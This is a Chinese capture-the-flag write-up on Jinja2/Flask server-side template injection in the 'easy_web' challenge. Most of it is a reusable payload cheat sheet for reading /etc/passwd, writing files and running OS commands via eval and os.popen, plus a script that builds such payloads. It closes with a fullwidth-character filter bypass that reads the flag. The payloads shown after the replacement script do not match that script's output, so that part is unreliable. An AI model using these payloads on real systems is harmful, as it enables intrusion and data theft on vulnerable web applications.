攻防世界 Web 安全挑战 easy_web SSTI 模板注入分析

安全研究员给出的几个常见 Payload：

1. Python 2

文件读取和写入

# 读文件
{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
# 写文件
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/1').write("") }}

任意执行

每次执行都要先写然后编译执行

{{''.__class__.__mro__[2].__subclasses__()[40]('/tmp/owned.cfg','w').write('code')}}
{{ config.from_pyfile('/tmp/owned.cfg') }}

2. Python 3

因为 Python 3 没有 file 了，所以用的是 open

# 文件读取
http://192.168.228.36/?name={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__[%27open%27](%27/etc/passwd%27).read()}}
# 任意执行
http://192.168.228.36/?name={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('id').read()")}}
# 命令执行
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}
# 文件操作
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}{% endif %}{% endfor %}

寻找 function 的过程可以用一个小脚本解决，脚本找到被重载过的 function，然后组成 payload。

#!/usr/bin/python3
# coding=utf-8
# python 3.5
from flask import Flask
from jinja2 import Template

# Some of special names
searchList = ['__init__', "__new__", '__del__', '__repr__', '__str__', '__bytes__', '__format__', '__lt__', '__le__', '__eq__', '__ne__', '__gt__', '__ge__', '__hash__', '__bool__', '__getattr__', '__getattribute__', '__setattr__', '__dir__', '__delattr__', '__get__', '__set__', '__delete__', '__call__', "__instancecheck__", '__subclasscheck__', '__len__', '__length_hint__', '__missing__','__getitem__', '__setitem__', '__iter__','__delitem__', '__reversed__', '__contains__', '__add__', '__sub__','__mul__']
neededFunction = ['eval', 'open', 'exec']
pay = int(input("Payload?[1|0]"))

for index, i in enumerate({}.__class__.__base__.__subclasses__()):
    for attr in searchList:
        if hasattr(i, attr):
            if eval('str(i.'+attr+')[1:9]') == 'function':
                for goal in neededFunction:
                    if (eval('"'+goal+'" in i.'+attr+'.__globals__["__builtins__"].keys()')):
                        if pay != 1:
                            print(i.__name__, ":", attr, goal)
                        else:
                            print("{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='" + i.__name__ + "' %}{{ c." + attr + ".__globals__['__builtins__']." + goal + "(\"[evil]\") }}{% endif %}{% endfor %}")

题目实战

题目描述

Web 安全挑战 easy_web，主要考察 SSTI 漏洞利用。

解题思路

打开链接页面，尝试输入任意测试字符串。

后端基于 Python，想到 SSTI 模板注入。

确定了服务器会将我们输入的参数当作 HTML 语言解析。

对输入框进行模糊测试，测试的返回是所有的单字符，即 ASCII 中 33-127 的所有字符（特殊符号，字母大小写，数字）。返回长度为 198 的内容表示该字符被过滤。

检测到特定字符被过滤，例如直接输入 { 会被过滤掉，因此我们可以使用替代字符绕过。

进行过滤字符替换，构造 Payload。

""" { -> ︷ /﹛ } -> ︸ /﹜ ' -> ＇ , -> ， """
str='{{\'\'.__class__.__mro__[1].__subclasses__()[91].get_data(0,\'/flag\')}}'
# 原字符串
# 如果需要替换 replace(被替换的字符，替换后的字符)
str=str.replace('{','︷')
str=str.replace('}','︸')
str=str.replace('\'','＇')
print(str)

得到替换后的函数：

︷︷().__class__.__mro__[1].__subclasses__()[91].__subclasses__()[91].__init__.__globals__.__builtins__[＇open＇](＇/flag＇).read()︸︸
︷︷().__class__.__bases__[0].__subclasses__()[91].__init__.__globals__.__builtins__[＇open＇](＇/flag＇).read()︸︸
︷︷().__class__.__bases__[0].__subclasses__()[91].__init__.__globals__.__builtins__[＇eval＇](＂__import__(＇os＇).popen(＇cat /flag＇).read()＂)︸︸

最终 Flag 为：flag{8f604f91-c36a-4413-bdaf-e786ffbfda61}